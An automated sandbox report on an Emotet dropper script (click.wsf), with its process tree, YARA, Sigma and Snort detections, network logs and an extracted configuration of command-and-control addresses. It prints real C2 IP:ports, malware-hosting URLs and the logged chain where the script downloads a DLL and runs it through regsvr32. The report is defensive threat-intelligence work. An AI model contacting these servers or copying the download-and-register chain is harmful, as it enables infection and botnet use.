Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
click.wsf

Overview

General Information

Sample Name:click.wsf
Analysis ID:830321
MD5:016fa961b9af49d75b597c2f61ab344c
SHA1:2fee0634cfa2988ee8f000724efc1c6c18beef23
SHA256:8343af0017ad64499072d1485302948a7ad744a638bd2deab301ae108b6b18fd
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 804 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)
  • wscript.exe (PID: 6404 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf" MD5: 563EDAE37876138FDFF47F3E7A9A78FD)
    • regsvr32.exe (PID: 6508 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll MD5: 578BAB56836A3FE455FFC7883041825B)
      • regsvr32.exe (PID: 6544 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll" MD5: 578BAB56836A3FE455FFC7883041825B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5MHq6bwAsAIA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2snoEbwASAJI="]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
  • 0x80c:$tagasp_long20: <script language="VB
  • 0x79f:$asp_payload9: execute "
  • 0xb2:$m_multi_one4: mid(
  • 0x2fb:$m_multi_one4: mid(
  • 0x4c8:$m_multi_one4: mid(
  • 0x6d1:$m_multi_one4: mid(
  • 0xa4c:$m_multi_one4: mid(
00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
  • 0x312:$asp_gen_obf1: "+"
  • 0x342:$asp_gen_obf1: "+"
  • 0x1bd6:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
  • 0x7a6:$jsp4: public
  • 0xde6:$jsp4: public
  • 0x126:$asp_input1: request
  • 0x954:$asp_input1: request
  • 0x996:$asp_input1: request
  • 0xaac:$asp_input1: request
  • 0x1e96:$asp_input1: request
  • 0x460:$asp_payload11: wscript.shell
  • 0x48:$asp_multi_payload_one1: createobject
  • 0x136:$asp_multi_payload_one1: createobject
  • 0x1ae:$asp_multi_payload_one1: createobject
  • 0x208:$asp_multi_payload_one1: createobject
  • 0x444:$asp_multi_payload_one1: createobject
  • 0xbaa:$asp_multi_payload_one1: createobject
  • 0xee2:$asp_multi_payload_one1: createobject
  • 0x1db8:$asp_multi_payload_one1: createobject
  • 0x1ea6:$asp_multi_payload_one1: createobject
  • 0x1f1e:$asp_multi_payload_one1: createobject
00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
  • 0xdea6:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
  • 0x1726:$jsp4: public
  • 0x1d66:$jsp4: public
  • 0x9726:$jsp4: public
  • 0x9d66:$jsp4: public
  • 0xb736:$jsp4: public
  • 0xbd76:$jsp4: public
  • 0xc786:$jsp4: public
  • 0xcdc6:$jsp4: public
  • 0x13e0:$asp_payload11: wscript.shell
  • 0x93e0:$asp_payload11: wscript.shell
  • 0xb3f0:$asp_payload11: wscript.shell
  • 0xc440:$asp_payload11: wscript.shell
  • 0xfc8:$asp_multi_payload_one1: createobject
  • 0x10b6:$asp_multi_payload_one1: createobject
  • 0x112e:$asp_multi_payload_one1: createobject
  • 0x1188:$asp_multi_payload_one1: createobject
  • 0x13c4:$asp_multi_payload_one1: createobject
  • 0x1b2a:$asp_multi_payload_one1: createobject
  • 0x1e62:$asp_multi_payload_one1: createobject
  • 0x8fc8:$asp_multi_payload_one1: createobject
00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
  • 0x1292:$asp_gen_obf1: "+"
  • 0x12c2:$asp_gen_obf1: "+"
  • 0x9292:$asp_gen_obf1: "+"
  • 0x92c2:$asp_gen_obf1: "+"
  • 0xb2a2:$asp_gen_obf1: "+"
  • 0xb2d2:$asp_gen_obf1: "+"
  • 0xc2f2:$asp_gen_obf1: "+"
  • 0xc322:$asp_gen_obf1: "+"
  • 0xdea6:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
  • 0x1726:$jsp4: public
  • 0x1d66:$jsp4: public
  • 0x9726:$jsp4: public
  • 0x9d66:$jsp4: public
  • 0xb736:$jsp4: public
  • 0xbd76:$jsp4: public
  • 0xc786:$jsp4: public
  • 0xcdc6:$jsp4: public
  • 0x10a6:$asp_input1: request
  • 0x18d4:$asp_input1: request
  • 0x1916:$asp_input1: request
  • 0x1a2c:$asp_input1: request
00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    Click to see the 11 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    3.2.regsvr32.exe.460000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      3.2.regsvr32.exe.460000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Sigma Signatures

        Malware Analysis System Evasion

        barindex
        Sigma detected: Run temp file via regsvr32
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6404, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll, ProcessId: 6508, ProcessName: regsvr32.exe

        Snort Signatures

        Timestamp:192.168.2.3187.63.160.8849735802404314 03/20/23-09:07:57.133517
        SID:2404314
        Source Port:49735
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3182.162.143.56497344432404312 03/20/23-09:07:41.132019
        SID:2404312
        Source Port:49734
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3104.168.155.1434973880802404302 03/20/23-09:08:15.086032
        SID:2404302
        Source Port:49738
        Destination Port:8080
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.391.121.146.474973180802404344 03/20/23-09:07:19.650620
        SID:2404344
        Source Port:49731
        Destination Port:8080
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3164.90.222.65497374432404308 03/20/23-09:08:10.886539
        SID:2404308
        Source Port:49737
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3167.172.199.1654973680802404310 03/20/23-09:08:05.635641
        SID:2404310
        Source Port:49736
        Destination Port:8080
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.366.228.32.314973370802404330 03/20/23-09:07:25.133944
        SID:2404330
        Source Port:49733
        Destination Port:7080
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://softwareulike.com/cWIYxWMPkK/Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0Avira URL Cloud: Label: malware
        Source: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnXAvira URL Cloud: Label: malware
        Source: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/XAvira URL Cloud: Label: malware
        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Avira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bKAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/YAvira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/zAvira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/vMAvira URL Cloud: Label: malware
        Source: https://167.172.199.165:8080/lAvira URL Cloud: Label: malware
        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006Avira URL Cloud: Label: malware
        Source: https://167.172.199.165:8080/Avira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgzAvira URL Cloud: Label: malware
        Source: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: http://ozmeydan.com/cekici/9/Avira URL Cloud: Label: malware
        Source: https://164.90.222.65/)Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/Avira URL Cloud: Label: malware
        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMAvira URL Cloud: Label: malware
        Source: https://penshorn.org/admin/Ses8712iGR8du/tMAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/4Avira URL Cloud: Label: malware
        Source: https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMAvira URL Cloud: Label: malware
        Source: https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/Avira URL Cloud: Label: malware
        Source: https://penshorn.org/admin/Ses8712iGR8du/Avira URL Cloud: Label: malware
        Source: http://softwareulike.com/cWIYxWMPkK/yMAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLLAvira URL Cloud: Label: malware
        Source: http://ozmeydan.com/cekici/9/xMAvira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dllAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/PAvira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/lAvira URL Cloud: Label: malware
        Source: https://104.168.155.143:8080/Avira URL Cloud: Label: malware
        Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/Avira URL Cloud: Label: malware
        Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zMAvira URL Cloud: Label: malware
        Source: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Avira URL Cloud: Label: malware
        Source: https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(Avira URL Cloud: Label: malware
        Source: https://www.gomespontes.com.br/logs/pd/0wAvira URL Cloud: Label: malware
        Source: http://softwareulike.com/cWIYxWMPkK/_Avira URL Cloud: Label: malware
        Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476Avira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URL
        Source: bbvoyage.comVirustotal: Detection: 8%Perma Link
        Source: penshorn.orgVirustotal: Detection: 14%Perma Link
        Source: www.gomespontes.com.brVirustotal: Detection: 5%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\Desktop\rad75349.tmp.dllReversingLabs: Detection: 79%
        Source: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)ReversingLabs: Detection: 79%
        Source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5MHq6bwAsAIA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2snoEbwASAJI="]}
        Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.3:49737 version: TLS 1.2
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 31.31.196.172 443
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 186.202.153.5 443
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 203.26.41.131 443
        Source: C:\Windows\System32\wscript.exeDomain query: penshorn.org
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080
        Source: C:\Windows\System32\wscript.exeDomain query: www.gomespontes.com.br
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443
        Source: C:\Windows\System32\wscript.exeDomain query: bbvoyage.com
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49731 -> 91.121.146.47:8080
        Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.3:49733 -> 66.228.32.31:7080
        Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.3:49734 -> 182.162.143.56:443
        Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49735 -> 187.63.160.88:80
        Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.3:49736 -> 167.172.199.165:8080
        Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.3:49737 -> 164.90.222.65:443
        Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.3:49738 -> 104.168.155.143:8080
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorIPs: 91.121.146.47:8080
        Source: Malware configuration extractorIPs: 66.228.32.31:7080
        Source: Malware configuration extractorIPs: 182.162.143.56:443
        Source: Malware configuration extractorIPs: 187.63.160.88:80
        Source: Malware configuration extractorIPs: 167.172.199.165:8080
        Source: Malware configuration extractorIPs: 164.90.222.65:443
        Source: Malware configuration extractorIPs: 104.168.155.143:8080
        Source: Malware configuration extractorIPs: 163.44.196.120:8080
        Source: Malware configuration extractorIPs: 160.16.142.56:8080
        Source: Malware configuration extractorIPs: 159.89.202.34:443
        Source: Malware configuration extractorIPs: 159.65.88.10:8080
        Source: Malware configuration extractorIPs: 186.194.240.217:443
        Source: Malware configuration extractorIPs: 149.56.131.28:8080
        Source: Malware configuration extractorIPs: 72.15.201.15:8080
        Source: Malware configuration extractorIPs: 1.234.2.232:8080
        Source: Malware configuration extractorIPs: 82.223.21.224:8080
        Source: Malware configuration extractorIPs: 206.189.28.199:8080
        Source: Malware configuration extractorIPs: 169.57.156.166:8080
        Source: Malware configuration extractorIPs: 107.170.39.149:8080
        Source: Malware configuration extractorIPs: 103.43.75.120:443
        Source: Malware configuration extractorIPs: 91.207.28.33:8080
        Source: Malware configuration extractorIPs: 213.239.212.5:443
        Source: Malware configuration extractorIPs: 45.235.8.30:8080
        Source: Malware configuration extractorIPs: 119.59.103.152:8080
        Source: Malware configuration extractorIPs: 164.68.99.3:8080
        Source: Malware configuration extractorIPs: 95.217.221.146:8080
        Source: Malware configuration extractorIPs: 153.126.146.25:7080
        Source: Malware configuration extractorIPs: 197.242.150.244:8080
        Source: Malware configuration extractorIPs: 202.129.205.3:8080
        Source: Malware configuration extractorIPs: 103.132.242.26:8080
        Source: Malware configuration extractorIPs: 139.59.126.41:443
        Source: Malware configuration extractorIPs: 110.232.117.186:8080
        Source: Malware configuration extractorIPs: 183.111.227.137:8080
        Source: Malware configuration extractorIPs: 5.135.159.50:443
        Source: Malware configuration extractorIPs: 201.94.166.162:443
        Source: Malware configuration extractorIPs: 103.75.201.2:443
        Source: Malware configuration extractorIPs: 79.137.35.198:8080
        Source: Malware configuration extractorIPs: 172.105.226.75:8080
        Source: Malware configuration extractorIPs: 94.23.45.86:4143
        Source: Malware configuration extractorIPs: 115.68.227.76:8080
        Source: Malware configuration extractorIPs: 153.92.5.27:8080
        Source: Malware configuration extractorIPs: 167.172.253.162:8080
        Source: Malware configuration extractorIPs: 188.44.20.25:443
        Source: Malware configuration extractorIPs: 147.139.166.154:8080
        Source: Malware configuration extractorIPs: 129.232.188.93:443
        Source: Malware configuration extractorIPs: 173.212.193.249:8080
        Source: Malware configuration extractorIPs: 185.4.135.165:8080
        Source: Malware configuration extractorIPs: 45.176.232.124:443
        Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
        Source: global trafficHTTP traffic detected: POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 164.90.222.65
        Source: Joe Sandbox ViewIP Address: 52.109.13.63 52.109.13.63
        Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
        Source: global trafficHTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbvoyage.com
        Source: global trafficHTTP traffic detected: GET /logs/pd/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.gomespontes.com.br
        Source: global trafficTCP traffic: 192.168.2.3:49731 -> 91.121.146.47:8080
        Source: global trafficTCP traffic: 192.168.2.3:49733 -> 66.228.32.31:7080
        Source: global trafficTCP traffic: 192.168.2.3:49736 -> 167.172.199.165:8080
        Source: global trafficTCP traffic: 192.168.2.3:49738 -> 104.168.155.143:8080
        Source: global trafficTCP traffic: 192.168.2.3:49739 -> 163.44.196.120:8080
        Source: global trafficTCP traffic: 192.168.2.3:49740 -> 160.16.142.56:8080
        Source: unknownNetwork traffic detected: IP country count 18
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:06:38 GMTServer: ApacheX-Powered-By: PHP/7.0.33Content-Length: 0Connection: closeContent-Type: text/html;charset=utf-8
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 52.109.13.63
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 52.109.76.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
        Source: unknownTCP traffic detected without corresponding DNS query: 52.109.76.141
        Source: unknownTCP traffic detected without corresponding DNS query: 52.109.13.63
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertif
